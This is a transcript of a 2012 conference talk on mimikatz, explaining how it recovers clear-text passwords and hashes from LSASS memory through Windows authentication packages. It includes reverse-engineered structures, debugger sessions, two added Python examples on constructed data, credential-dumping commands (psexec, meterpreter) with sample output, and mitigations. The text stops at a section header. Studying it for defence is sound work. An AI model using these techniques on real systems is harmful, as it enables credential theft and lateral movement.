mimikatz @ ASFWS 2012 - gentil kiwi (slide transcript)
mimikatz
Benjamin DELPY `gentilkiwi`
focus on sekurlsa, pass-the-pass and crypto patches
Who / Why

Benjamin DELPY `gentilkiwi`
- French
- 26y
- Kiwi addict
- Lazy programmer

Started to code mimikatz to
- explain security concepts
- improve my knowledge
- prove to Microsoft that sometimes they must change old habits

Why all in French?
- because I'm
- It limits script kiddies usage
- Hack with class
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com, blog.gentilkiwi.com
mimikatz: working

On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
- x86 & x64
- 2000 support dropped with mimikatz 1.0
Everywhere it's statically compiled

Two modes
- direct action (local commands)
- process or driver communication
mimikatz: architecture of sekurlsa & crypto

Diagram of the two modes:
- mimikatz.exe → LSASS.EXE, KeyIso service ("CNG Key Isolation"): direct action, crypto::patchcng
- mimikatz.exe → SVCHOST.EXE, EventLog service ("Windows Event Log"): direct action, divers::eventdrop
- mimikatz.exe → LSASS.EXE, SamSS service ("Security Accounts Manager"), through sekurlsa.dll: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread; the injected DLL opens a pipe, writes a welcome message, waits for commands… and returns results
Modules (diagram labels):
- mimikatz.exe: mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege
- shared library: mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptoacng
- sekurlsa.dll (injected in LSASS): msv_1_0, tspkg, wdigest, livessp, kerberos
- other payloads and driver: kappfree.dll, kelloworld.dll, klock.dll, mimikatz.sys
- LSASS data read by the modules: sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg
mimikatz sekurlsa: what is it?

A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)

What sekurlsa module can dump:
- MSV1_0 hashes
- TsPkg passwords
- Wdigest passwords
- LiveSSP passwords
- Kerberos passwords
- …
mimikatz sekurlsa: how LSA works (… level)

Diagram (PLAYSKOOL): WinLogon collects user / domain / password and passes them to LsaSS, which hands them to the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos); msv1_0 (against the SAM) and kerberos perform the actual authentication, by challenge/response.
mimikatz sekurlsa: how LSA works (… level)

Authentication packages
- take user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)

If we can get data and inject it in another session of LSASS, we avoid the authentication part
This is the principle of « Pass-the-hash »
- In fact of « Pass-the-x »
mimikatz sekurlsa: history of « pass-the-x » 1/2

Pass-the-hash
- 1997 - Unix: modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marcus Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French, so not famous ;))
2007 was the year of pass the hash

Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz sekurlsa: history of « pass-the-x » 2/2

Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases to Microsoft about it…
…Lots of time…
- begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz sekurlsa tspkg
because sometimes hash is not enough…
mimikatz sekurlsa tspkg: what is it?

Microsoft introduces SSO capability for Terminal Server with NT 6, to improve RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression: it seems cool
- User does not have to type its password
- Password is not in RDP file
- Password is not in user secrets
mimikatz sekurlsa tspkg: questions

KB says that, for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - http://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? Hash? Ticket? It seems…
- In all cases system seems to be vulnerable to pass-the-…

In what form? Our specs [MS-CSSP]:
- 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, password is sent to server…

So password resides somewhere in memory!
mimikatz sekurlsa tspkg: symbols & theory

Let's explore some symbols
- sounds cool… (thanks Microsoft)

Let's imagine a scenario
- Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with LUID to obtain
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz sekurlsa tspkg: workflow

LsaEnumerateLogonSessions → for each LUID → tspkg!TSGlobalCredTable → RtlLookupElementGenericTableAvl → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg: demo time
sekurlsa::tspkg
mimikatz sekurlsa wdigest
because clear text password over http/https is not cool
mimikatz sekurlsa wdigest: what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz sekurlsa wdigest: what is it?

We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[…])

Even after login HA1 may change… realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers:
- Username
- Realm (from server)
- Password
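The response computation above, as an added worked example (Python with the standard library, not code from the slides or from mimikatz). The input values are the RFC 2617 §3.5 sample exchange, used here as constructed test data. The point it makes concrete: HA1 is bound to the realm the server chooses, so a provider that must answer servers it has never seen has to keep the password, while HA1 for one known realm is already enough to answer every challenge from that realm.

```python
import hashlib
from typing import Iterable, Optional


def _h(*fields: str) -> str:
    """RFC 2617 H(): MD5 over the colon-joined fields, as lowercase hex."""
    return hashlib.md5(":".join(fields).encode("utf-8")).hexdigest()


def digest_ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is picked by the server."""
    return _h(username, realm, password)


def digest_ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth or the legacy form (auth-int also hashes the body)."""
    return _h(method, uri)


def digest_response_from_ha1(ha1: str, method: str, uri: str, nonce: str,
                             qop: Optional[str] = None, nc: Optional[str] = None,
                             cnonce: Optional[str] = None) -> str:
    """The response a client sends back. Only HA1 is needed here, not the password itself."""
    ha2 = digest_ha2(method, uri)
    if qop is None:
        return _h(ha1, nonce, ha2)                 # legacy (RFC 2069) form
    return _h(ha1, nonce, nc, cnonce, qop, ha2)    # RFC 2617 form with qop


def digest_response(username: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, qop: Optional[str] = None, nc: Optional[str] = None,
                    cnonce: Optional[str] = None) -> str:
    """Full client-side computation from the password, as a provider that kept it would do."""
    ha1 = digest_ha1(username, realm, password)
    return digest_response_from_ha1(ha1, method, uri, nonce, qop, nc, cnonce)


def ha1_for_realms(username: str, password: str, realms: Iterable[str]) -> dict:
    """One HA1 per realm: there is no single 'hash' to keep for servers not met yet."""
    return {realm: digest_ha1(username, realm, password) for realm in realms}


# Constructed input: the worked example of RFC 2617 section 3.5.
RFC2617_EXAMPLE = dict(
    username="Mufasa", realm="testrealm@host.com", password="Circle Of Life",
    method="GET", uri="/dir/index.html",
    nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", qop="auth",
    nc="00000001", cnonce="0a4f113b",
)

if __name__ == "__main__":
    print("response:", digest_response(**RFC2617_EXAMPLE))
    # Same user and password, two realms: two different HA1 values.
    for realm, ha1 in ha1_for_realms("Mufasa", "Circle Of Life",
                                     ["testrealm@host.com", "intranet.example"]).items():
        print(f"HA1 for {realm}: {ha1}")
```

`digest_response_from_ha1` is the practitioner's caveat: anyone holding HA1 for a realm can answer that realm's challenges without the password, so a stored HA1 deserves the same protection as a password hash; WDigest simply goes one step further and keeps the password because the realm is not known in advance.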
mimikatz sekurlsa wdigest: theory

This time we know
- that WDigest keeps password in memory « by protocol » for HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects them with LsaProtectMemory)

LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a research in WDigest
- Hypothesis seems verified

.text:7409D151  _DigestCalcHA1@8         call    dword ptr [eax+0B4h]

LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a research in WDigest
- SpAcceptCredentials takes clear password in args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in double linked list wdigest!l_LogSessList

.text:74096C69  _SpAcceptCredentials@16  call    dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest: workflow

LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList → search linked list for LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz sekurlsa wdigest: demo time
sekurlsa::wdigest
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
mimikatz sekurlsa livessp: how?

Actually I've only used a logical (empirical) approach to search passwords…
- Protocol reading
- Symbols searching
~ Boring ~… be more brutal this time: make a WinDBG trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp: how?

Let's login with a Live account on Windows 8

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Our LiveSSP provider:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[…]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah! Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp: workflow

LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search linked list for LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz sekurlsa kerberos

Let's login with a normal account

After credentials protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Kerberos part for password:
lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

Kerberos ticket part? Maybe ;)
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6): workflow

LsaEnumerateLogonSessions → for each LUID → kerberos!KerbGlobalLogonSessionTable → RtlLookupElementGenericTableAvl → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5): workflow

LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search linked list for LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
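The "for each LUID, search the linked list, read the LSA_UNICODE_STRINGs" step shared by the WDigest, LiveSSP and Kerberos (NT5) workflows above, as an added example in Python (not mimikatz code). It walks a circular LIST_ENTRY chain inside a constructed 32-bit memory snapshot, the way a reader of an LSASS dump would. Everything about the snapshot is made up for illustration: the base address, the field offsets (the "[…]" fields of the real KIWI_* entries are left out, so real offsets differ per Windows build), and the SAMPLE_SESSIONS. In a live LSASS the Password buffer would still be LsaProtectMemory output to be decrypted with the lsasrv keys described later; here it is stored in clear so the walk itself can be checked.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Constructed 32-bit model of a slice of LSASS memory (example only, not a real dump).
BASE = 0x75A00000           # assumed base address of the modelled region
SIZE = 0x4000
HEAD_VA = BASE + 0x1000     # stands in for wdigest!l_LogSessList (a LIST_ENTRY head)
ENTRIES_VA = BASE + 0x2000  # where the constructed list entries live
STRINGS_VA = BASE + 0x3000  # where the constructed UNICODE buffers live
MAX_ENTRIES = 4096          # guard: never loop forever on a corrupted Flink chain

# Assumed x86 layout, in the spirit of KIWI_WDIGEST_LIST_ENTRY:
#   Flink, Blink, UsageCount, This          4 x DWORD
#   LocallyUniqueIdentifier                 LUID (LowPart DWORD, HighPart LONG)
#   UserName, Domaine, Password             3 x LSA_UNICODE_STRING
#   LSA_UNICODE_STRING (x86) = USHORT Length, USHORT MaximumLength, PWSTR Buffer
ENTRY_FMT = "<IIIIIi" + "HHI" * 3
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)   # 48 bytes


@dataclass
class LogonSession:
    luid: int
    user_name: str
    domain: str
    password: str   # in a live LSASS still LsaProtectMemory output; clear in this model


def _read(mem: bytes, va: int, size: int) -> bytes:
    """Read `size` bytes at virtual address `va`; fail loudly on a bad pointer, like ReadProcessMemory."""
    off = va - BASE
    if off < 0 or off + size > len(mem):
        raise ValueError(f"address {va:#x}+{size:#x} is outside the snapshot")
    return mem[off:off + size]


def _read_lsa_unicode_string(mem: bytes, length: int, maximum: int, buffer: int) -> str:
    if buffer == 0 or length == 0:
        return ""
    if length > maximum or length % 2:
        raise ValueError("inconsistent LSA_UNICODE_STRING")
    return _read(mem, buffer, length).decode("utf-16-le")


def find_logon_session(mem: bytes, luid: int) -> Optional[LogonSession]:
    """The 'search linked list for LUID' step: follow Flink from the head until the
    chain comes back to the head. Returns None if no entry carries that LUID."""
    (cur,) = struct.unpack("<I", _read(mem, HEAD_VA, 4))   # head->Flink
    for _ in range(MAX_ENTRIES):
        if cur == HEAD_VA:
            return None
        (flink, _blink, _usage, _this, luid_lo, luid_hi,
         u_len, u_max, u_buf, d_len, d_max, d_buf,
         p_len, p_max, p_buf) = struct.unpack(ENTRY_FMT, _read(mem, cur, ENTRY_SIZE))
        if ((luid_hi & 0xFFFFFFFF) << 32 | luid_lo) == luid:
            return LogonSession(
                luid=luid,
                user_name=_read_lsa_unicode_string(mem, u_len, u_max, u_buf),
                domain=_read_lsa_unicode_string(mem, d_len, d_max, d_buf),
                password=_read_lsa_unicode_string(mem, p_len, p_max, p_buf),
            )
        cur = flink
    raise RuntimeError("list never returned to its head: corrupted Flink chain?")


# Constructed demo sessions (LUIDs, names and password are made up for the example).
SAMPLE_SESSIONS = [
    (0x3E7,   "VM-W8-RP-X$",     "WORKGROUP",    ""),
    (0x39A44, "Gentil Kiwi",     "vm-w8-rp-x",   "waza1234"),
    (0x3E4,   "NETWORK SERVICE", "NT AUTHORITY", ""),
]


def build_snapshot(sessions=SAMPLE_SESSIONS) -> bytes:
    """Lay the sessions out as a circular doubly linked list hanging off HEAD_VA."""
    mem = bytearray(SIZE)
    next_str = STRINGS_VA

    def put_string(text: str):
        nonlocal next_str
        data = text.encode("utf-16-le")
        if not data:
            return 0, 0, 0                   # empty string: NULL buffer
        va = next_str
        mem[va - BASE:va - BASE + len(data)] = data
        next_str += len(data) + 2            # room for the NUL terminator (MaximumLength)
        return len(data), len(data) + 2, va

    vas = [ENTRIES_VA + i * 0x40 for i in range(len(sessions))]
    for i, (luid, user, domain, password) in enumerate(sessions):
        flink = vas[i + 1] if i + 1 < len(vas) else HEAD_VA
        blink = vas[i - 1] if i > 0 else HEAD_VA
        fields = (flink, blink, 1, vas[i], luid & 0xFFFFFFFF, luid >> 32,
                  *put_string(user), *put_string(domain), *put_string(password))
        struct.pack_into(ENTRY_FMT, mem, vas[i] - BASE, *fields)
    struct.pack_into("<II", mem, HEAD_VA - BASE, vas[0], vas[-1])
    return bytes(mem)


SNAPSHOT = build_snapshot()

if __name__ == "__main__":
    for luid, *_ in SAMPLE_SESSIONS:   # in mimikatz these LUIDs come from LsaEnumerateLogonSessions
        print(find_logon_session(SNAPSHOT, luid))
```

Two details matter when this is done against a real dump rather than the model: the walk must stop when Flink returns to the head (and bail out after a bounded number of hops, since a partially overwritten list never terminates), and every LSA_UNICODE_STRING must be sanity-checked (Length ≤ MaximumLength, even, non-NULL buffer) before its Buffer is dereferenced, because a stale entry is how a dump parser ends up reading garbage as a "password".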
mimikatz sekurlsa: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos: "hu?"

Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)

From my understanding of Microsoft explanations:
- no need of passwords for the Kerberos protocol…
- all is based on the hash (not very sexy too)

Microsoft's implementation of Kerberos is full of logical…
- For password auth
  • password hash for shared secret, but keeping password in memory
- For full smartcard auth
  • No password on client
  • No hash on client
  - NTLM hash on client…
  - KDC sent it back as a gift
mimikatz sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take benefit of its keys when we called it

Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz sekurlsa: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx

Keys (globals of lsasrv.dll inside lsass, copied… into the lsasrv.dll loaded by mimikatz):
- g_cbRandomKey: DWORD (256)
- g_pRandomKey → BYTE[g_cbRandomKey]
- g_pDESXKey → BYTE[144]
- g_Feedback: BYTE[8]
mimikatz sekurlsa: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses
- 3DES
- AES

Keys (globals of lsasrv.dll inside lsass, copied… into mimikatz):
- InitializationVector: BYTE[16]
- h3DesKey → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA
- hAesKey → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa: memo

Security Packages
Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa: memo

Some commands:
mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)  /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request for ACTIVATION of privilege : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id      : 0;234870
Authentication package : NTLM
Primary user           : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
    msv1_0 :   User : Gentil Kiwi   Domain : vm-w8-rp-x   LM hash : d0e9aee149655a6075e4540af1f22d3b   NTLM hash : cc36cf7a8514893efccd332446158b1a
    kerberos : User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
    wdigest :  User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
    tspkg :    User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
    livessp :  n.t. (LUID KO)
mimikatz sekurlsa: what we can do

Basics
- No physical access to computer (first step to pass the hash, then pass the pass)
- No admin rights, system rights, debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged accounts, network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights, system rights, debug privileges, even for VIPs
- Use separated network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic
  • biometrics (it keeps password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Let opportunities to stop retro compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?

A little module that I wrote to
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  • Even those which are "not" exportable

What crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public in DER format
    - with private keys in PFX format
  • Private keys in PVK format - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mimikatz crypto: how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"

Export/Usage can be limited by
- Password
- Popup
- Export/Archive flag not present
(diagram notes: password and popup are a constraint for most users, and unavailable for computer keys)

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works

